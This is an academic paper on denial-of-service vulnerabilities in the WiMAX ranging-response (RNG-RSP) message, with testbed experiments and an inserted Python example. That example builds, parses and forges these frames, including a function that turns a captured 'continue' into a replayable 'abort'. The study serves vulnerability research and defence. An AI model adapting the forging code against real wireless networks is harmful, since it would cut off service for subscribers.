International Journal of Network and Mobile Technologies ISSN 2229-9114 Electronic Version VOL 2 / ISSUE 1 / JANUARY 2011
This paper is available online at http://ijnmt.intimal.edu.my/
Simulating Denial of Service Attack Using WiMAX Experimental Setup
John Kok Han Hong (1), Mohamad Yusoff Alias (2) and Bok Min Goi (3)
(1) Multimedia University, Cyberjaya, Malaysia, Faculty of Engineering, [email protected]
(2) Multimedia University, Cyberjaya, Malaysia, Faculty of Engineering, [email protected]
(3) Tunku Abdul Rahman University, Malaysia, Faculty of Engineering & Science, [email protected]
Abstract The IEEE802.16 Wireless Metropolitan Area Network (WMAN) is set to revolutionize the delivery of Broadband Wireless Access (BWA), not unlike how the IEEE802.11 WiFi standard popularized wireless access for the masses. Designed to operate over distances as large as 50 km at speeds of up to 74 Mbps, it will serve many users in both fixed and mobile environments. To manage the system, the standard describes a set of Medium Access Control (MAC) procedures and air interfaces that cover a broad range of applications. This paper presents a study of IEEE802.16's MAC operation, particularly the Ranging Response (RNG-RSP) message and its vulnerability to DoS attacks. We have tested several aspects of how the RNG-RSP message can be exploited on a live IEEE802.16e network to ascertain the impact of such DoS attacks on WiMAX systems.
Key words: WiMAX, Denial of Service, WMAN, MAC, Ranging Response Message
1 Introduction
Worldwide Interoperability for Microwave Access (WiMAX) is a wireless broadband solution that offers a wide range of deployment options and services. Its Orthogonal Frequency Division Multiplexing (OFDM)-based physical layer is resistant to multipath loss and supports very high peak data rates, as high as 74 Mbps over a distance of 50 km, while serving a large number of users. WiMAX is also an Internet Protocol (IP)-based network with full support for mobility and built-in power-saving mechanisms [2]. IEEE802.16e-2005 Mobile WiMAX extended the scope of WiMAX to mobile use, and that mobility support introduced many changes to the PHY and MAC layer protocols in order to address issues not present in IEEE802.16-2004 Fixed WiMAX, such as power management, handoff and enhanced security [4], [5]. The MAC layer of the IEEE802.16e-2005 specification is therefore considerably different from that of IEEE802.16-2004, which does not support mobility: QoS, handoff and power management support have been added. The security features of the IEEE802.16 standard lie in the privacy sublayer, which provides the Subscriber Station (SS) with security capabilities and protects the Base Station (BS) from malicious attacks that may disrupt its services. However, many vulnerabilities remain, and the standard is still susceptible to attacks on its integrity and availability [1].
2 IEEE802.16e MAC Layer
The MAC layer allows for dynamically variable modulation and forward error correction (FEC) coding, which enables the BS and SS to optimize their transmission burst profile on a frame-by-frame basis, trading bandwidth for robustness. The BS initially transmits with the most robust modulation and FEC scheme available, to ensure that all SSs are able to receive the uplink (UL-) and downlink (DL-) maps, and then moves to progressively higher-capacity bursts according to the schedule described in the DL-MAP. Similarly, each SS transmits its uplink at exactly the time, and with the burst profile, scheduled by the BS. If required, an SS can ask for longer uplink windows that allow it to pass more traffic. By exchanging Dynamic Service Change requests and grants, the BS and SS negotiate bandwidth allocations according to their respective needs and capabilities. Different mechanisms are used to tailor the service level received by an SS, e.g. unsolicited bandwidth grants and polled opportunities [3].
3 Initial Network Entry
Figure 1: Network Entry – Ranging
During initial network entry, the SS announces its presence to the BS on a detected active channel via a Ranging Request (RNG-REQ) message. The BS in turn uses the Ranging Response (RNG-RSP) message to adjust the SS's transmission frequency, timing and power. The RNG-RSP is also sent periodically to the SS to fine-tune transmission parameters, regardless of whether the SS has sent an RNG-REQ. This message is of interest because broadcast management frames are largely dependent on the timing and state machines of the MAC [6]. After ranging, the next step of the network entry process is getting the SS authorized to enter the network. As data integrity and security are a large concern for major deployments, the IEEE802.16 standard makes provision for strong authentication of the SS, handled by the security sublayer of the MAC.
4 Anatomy of the RNG-RSP Message
The RNG-RSP message sent periodically by the BS to fine-tune transmission parameters is formatted as in Table 1.

Table 1: RNG-RSP Message Format [4]

Management message type | Uplink Channel ID (8 bits)                          | Message content
5 = RNG-RSP             | ID of uplink channel on which BS received RNG-REQ   | Shown in Table 2

Table 2: RNG-RSP Message Encodings [4]

Name                        | Description
Power Level Adjust          | Tx power adjustment; specifies the change in SS transmission power level
Downlink Frequency Override | Center frequency, in kHz, of the new downlink channel; the SS must redo initial ranging
Downlink Op. Burst Profile  | Sent in response to RNG-REQ; contains the DIUC for BS transmissions to the SS
Ranging Status              | Indicates whether uplink messages are within the BS's limits: 1 = continue, 2 = abort, 3 = success, 4 = rerange

Table 2 shows a truncated list of the RNG-RSP message encodings that are of interest and potentially exploitable in Denial of Service (DoS) attacks. As the table shows, the RNG-RSP message can do much more than fine-tune transmission parameters: it can order the SS to change uplink or downlink channel, change its transmission power level, or even abort all transmissions and reinitialize its MAC [3].
5 Exploiting RNG-RSP
The RNG-RSP message is open to potentially very serious exploitation because it is unencrypted, unauthenticated and stateless. A validly formatted RNG-RSP message addressed to the SS will therefore almost certainly be accepted and acted upon regardless of when it is sent. There are several ways the RNG-RSP message can be exploited to cause a DoS attack.

The simplest method is to forge and replay unsolicited RNG-RSP messages with the Ranging Status field set to 2, telling the SS to abort communications and reinitialize its MAC. The attacker needs to determine the victim's Connection Identifier (CID) a priori in order to address the message to it. The attack is attractive to the attacker because it requires no knowledge apart from the CID, which can be derived from broadcast messages or, since the CID is only a 16-bit field, even guessed by brute force.

Other ways forged RNG-RSP messages can be used to disrupt the network follow from the truncated list of message encodings in Table 2. The transmission power of the SS can be adjusted to be either too low, to the point where the SS cannot reach the BS and has to waste resources repeatedly correcting itself, or too high, severely draining the battery of mobile devices in what is known as the "water torture attack" [7]. The SS's uplink or downlink channel may be overridden by the RNG-RSP, instructing the SS to shift to some other channel of the attacker's choice. If the attacker does not operate a BS on that channel, the SS will scan and discard unused channels and eventually find its way back to the proper channel. Depending on the number of channels available, this takes some time, as the SS has to spend a minimum of 2 ms listening on each channel before moving on.

It must be noted that the prior research on Denial of Service attacks in [3] and [7] is purely academic and conjectural, based on detailed study of, and approximation from, the IEEE802.16 standard. The aim of this research is to provide a simulation and real-world experimentation to shed light on these reported vulnerabilities.
6 Experiment
In this section, the aim is to set up a simple WiMAX network consisting of a BS and an SS and to study the effects of simulated components of a maliciously modified RNG-RSP attack, namely adjustment of the power level, overriding of the downlink frequency, and the ranging status.
6.1 Experimental Setup and Metrics
The experiment to assess the effects of an RNG-RSP DoS attack was carried out on a live WiMAX network consisting of a Motorola WAP400 IEEE802.16e BS and a Dell laptop computer equipped with a Beceem IEEE802.16e PCMCIA card serving as the SS. Readings were taken at the SS using Beceem's diagnostic tools. Table 3 shows the configuration used in the experiment.
Figure 2: IEEE802.16e testbed

Table 3: Experimental Configuration

Standard                              | IEEE802.16e-2005
Center frequency                      | 2.643 GHz
Average received signal at SS at 10 m | -50 dBm
SS MAC address                        | 00:12:CF:41:E5:0E
6.2 Experimental Evaluation and Results
At present, fabrication and injection of IEEE802.16e management frames is not yet possible on this testbed, but commands that modify the behavior and characteristics of members of the network can be sent and acted upon, which replicates the effect of an unsolicited, compromised management frame. In the first experiment, we sought to determine the effects of tampering with the SS power level, as is possible with the RNG-RSP message. The SS was located 10 m from the BS and its transmission power level was monitored for 120 s. Instructions to reduce the power to -40 dBm (the lowest setting) were injected at t = 41 s and t = 71 s.
Figure 3: Experiment 1 - SS Transmission Power

The purpose of the second experiment was to capture the RNG-RSP message sent by the BS to the SS during the initial ranging period. As mentioned earlier, the management frame is unencrypted and can therefore be read directly, as below:
7 Discussion
This experiment is only an approximation of the academic analysis of what happens when a compromised RNG-RSP message is received by the SS. Messages modifying the parameters of the SS were input directly during regular operation to simulate unsolicited RNG-RSP messages. Ideally, the experiment should be performed with three members in the network: BS, victim SS and malicious SS. The malicious SS would pose as the attacker, with the capability to sniff and derive information such as UL-MAP schedules and the BS and SS CIDs, to fabricate modified management messages, and to inject them towards the victim SS.

In the first experiment, the transmission power of the SS hovers around -18 dBm under normal operation. When injected with the instruction to power down to -40 dBm (the minimum), the SS complies immediately; once disconnected, it attempts to raise its transmit power to re-establish communications. Each reconnection takes approximately 10 s, during which there is no service.

In the second experiment, the payload can be interpreted directly using the standard [4]. The first bytes are the most important. Read against Table 1, 05 is management message type 5, RNG-RSP, and 00 is the Uplink Channel ID (the CID itself is carried in the generic MAC header that precedes the management payload, not in the payload). The bytes that follow are the TLV-encoded information of Table 2: 04 is the type of the Ranging Status TLV, 01 is its one-byte length, and the value byte after it is the status, which in the capture indicated continue ranging (1). Because the message is unencrypted and unauthenticated, it is possible to capture this message, overwrite the status value with 2 (abort, per Table 2), and replay it. The victim SS cannot verify the message and will accept it as an instruction from the BS to abort.

In light of the results obtained from these experiments, the reaction to unsolicited management frames such as the RNG-RSP message depends largely on the manufacturer's design of the network equipment and may vary. It is very clear, however, that a simple DoS attack using tampered management frames can be very damaging to network efficiency.
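The following is an added worked example (the editor's code, not the authors' tooling or any capture from the testbed) that ties together the message layout of Section 4, the forge-and-replay attack of Section 5 and the byte-level reading above. It builds a RNG-RSP frame addressed to a CID, parses it back, rewrites a captured "continue" into an "abort", and classifies which Table 2 levers a frame pulls. What it assumes, from IEEE 802.16-2004 [4] rather than from the paper: a 6-byte generic MAC header whose HCS is a CRC-8 with generator x^8 + x^2 + x + 1 over the first five header bytes, and TLV type numbers Power Level Adjust = 2, Ranging Status = 4, Downlink Frequency Override = 5. The CID 0x0123, the 10 dB alert threshold and every frame in it are constructed sample values.

```python
"""Added worked example (editor's code, not from the paper): build, parse and
forge the RNG-RSP message of Sections 4, 5 and 7, then flag the Table 2 fields
that Section 5 identifies as DoS levers. Assumed from IEEE 802.16-2004 [4], not
from the paper's capture: a 6-byte generic MAC header whose HCS is a CRC-8
(generator x^8 + x^2 + x + 1) over the first five bytes, and TLV types Power
Level Adjust = 2, Ranging Status = 4, Downlink Frequency Override = 5. All CIDs
and frames below are constructed sample values."""
from __future__ import annotations

import struct

RNG_RSP = 5                 # management message type (Table 1)
TLV_POWER_LEVEL_ADJUST = 2  # signed 8-bit value in units of 0.25 dB
TLV_RANGING_STATUS = 4      # 1 = continue, 2 = abort, 3 = success, 4 = rerange
TLV_DL_FREQ_OVERRIDE = 5    # 32-bit centre frequency in kHz
RANGING_STATUS = {1: "continue", 2: "abort", 3: "success", 4: "rerange"}


def hcs(header5: bytes) -> int:
    """Header Check Sequence: CRC-8, polynomial 0x07, init 0, no reflection."""
    crc = 0
    for byte in header5:
        crc ^= byte
        for _ in range(8):
            crc = ((crc << 1) ^ 0x07) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc


def generic_mac_header(cid: int, payload_len: int) -> bytes:
    """Generic MAC header (HT=0, EC=0, type 0, no payload CRC) addressed to cid.
    LEN counts the 6 header bytes plus the payload."""
    length = 6 + payload_len
    head = bytes([0x00, (length >> 8) & 0x07, length & 0xFF]) + struct.pack(">H", cid)
    return head + bytes([hcs(head)])


def build_rng_rsp(cid: int, ul_channel_id: int, tlvs: list[tuple[int, bytes]]) -> bytes:
    """Frame = generic MAC header + message type + UL channel ID + TLVs."""
    payload = bytes([RNG_RSP, ul_channel_id])
    for tlv_type, value in tlvs:
        payload += bytes([tlv_type, len(value)]) + value
    return generic_mac_header(cid, len(payload)) + payload


def parse_rng_rsp(frame: bytes) -> dict:
    """Decode a frame. The HCS is the only check an SS can make on this message,
    and anyone can compute it: that is the weakness Section 5 describes."""
    if len(frame) < 8:
        raise ValueError("frame too short")
    head = frame[:5]
    if hcs(head) != frame[5]:
        raise ValueError("bad HCS")
    length = ((head[1] & 0x07) << 8) | head[2]
    cid = struct.unpack(">H", head[3:5])[0]
    payload = frame[6:length]
    if len(payload) < 2 or payload[0] != RNG_RSP:
        raise ValueError("not an RNG-RSP")
    msg = {"cid": cid, "ul_channel_id": payload[1], "tlvs": {}}
    i = 2
    while i < len(payload):
        if i + 2 > len(payload) or i + 2 + payload[i + 1] > len(payload):
            raise ValueError("truncated TLV")
        tlv_type, n = payload[i], payload[i + 1]
        value = payload[i + 2:i + 2 + n]
        i += 2 + n
        if tlv_type == TLV_RANGING_STATUS and n == 1:
            msg["tlvs"]["ranging_status"] = RANGING_STATUS.get(value[0], value[0])
        elif tlv_type == TLV_POWER_LEVEL_ADJUST and n == 1:
            msg["tlvs"]["power_adjust_db"] = struct.unpack("b", value)[0] * 0.25
        elif tlv_type == TLV_DL_FREQ_OVERRIDE and n == 4:
            msg["tlvs"]["dl_freq_khz"] = struct.unpack(">I", value)[0]
        else:
            msg["tlvs"][tlv_type] = value  # e.g. Downlink Op. Burst Profile, kept raw
    return msg


def forge_abort(captured: bytes) -> bytes:
    """Section 5 attack: keep the CID and channel of a captured 'continue'
    RNG-RSP and replace its contents with Ranging Status = 2 (abort)."""
    seen = parse_rng_rsp(captured)
    return build_rng_rsp(seen["cid"], seen["ul_channel_id"],
                         [(TLV_RANGING_STATUS, bytes([2]))])


def disruptive_effects(frame: bytes) -> list[str]:
    """Which Table 2 levers does the frame pull? A monitor on either side could
    alert on these outside an active ranging exchange (10 dB threshold assumed)."""
    tlvs = parse_rng_rsp(frame)["tlvs"]
    effects = []
    if tlvs.get("ranging_status") in ("abort", "rerange"):
        effects.append(tlvs["ranging_status"])
    if "dl_freq_khz" in tlvs:
        effects.append("dl_frequency_override")
    if abs(tlvs.get("power_adjust_db", 0.0)) >= 10.0:
        effects.append("large_power_adjust")
    return effects


if __name__ == "__main__":
    # Constructed "capture": the BS tells basic CID 0x0123 to continue ranging.
    captured = build_rng_rsp(0x0123, 0, [(TLV_RANGING_STATUS, bytes([1]))])
    forged = forge_abort(captured)
    print("captured payload:", captured[6:].hex(" "))  # 05 00 04 01 01
    print("forged payload:  ", forged[6:].hex(" "))    # 05 00 04 01 02
    print("effects of forged frame:", disruptive_effects(forged))  # ['abort']
```

The forged frame passes every check the receiver has (well-formed header, correct HCS, known message type, valid TLV) because none of those checks involves a secret; only a keyed integrity check on management messages, or state that refuses an abort outside an active ranging exchange, would distinguish it from the BS's own RNG-RSP.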
8 Conclusion
Unlike with earlier technology such as IEEE802.11, there is still time to improve the security of the IEEE802.16 standard before it becomes as ubiquitous as WiFi is today. This paper has presented a study of IEEE802.16's MAC operation, particularly the RNG-RSP message and its vulnerability to DoS attacks. We have tested several aspects of how the RNG-RSP message can be exploited on a live IEEE802.16e network to ascertain the impact of such DoS attacks on WiMAX systems.
Acknowledgements This project is funded by the Ministry of Science, Technology and Innovation (MOSTI) of Malaysia under the eScienceFund programme.
References
[1] S. Ahsan, WiMAX Standards and Security, CRC Press, 2008.
[2] J. G. Andrews, A. Ghosh and R. Muhamed, Fundamentals of WiMAX: Understanding Broadband Wireless Networking, Prentice Hall, 2007.
[3] D. Boom and R. Buddenberg, Denial of Service Vulnerabilities in IEEE802.16 Wireless Networks, IEEE C802.16e-04/406, 2004.
[4] IEEE, Part 16: Air Interface for Fixed Broadband Wireless Access Systems, IEEE Std 802.16-2004, October 2004.
[5] IEEE, Part 16: Air Interface for Fixed and Mobile Broadband Wireless Access Systems. Amendment 2: Physical and Medium Access Control Layers for Combined Fixed and Mobile Operation in Licensed Bands and Corrigendum 1, IEEE Std 802.16e-2005 and IEEE Std 802.16-2004/Cor 1-2005, October 2005.
[6] A. Makelainen, Analysis of Handoff Performance in Mobile WiMAX Networks, Helsinki University of Technology, December 2007.
[7] S. Naseer, M. Younus and A. Ahmed, Vulnerabilities Exposing IEEE802.16e Networks to DoS Attacks: A Survey, 9th ACIS International Conference on Software Engineering, Artificial Intelligence, Networking and Parallel/Distributed Computing, 2008.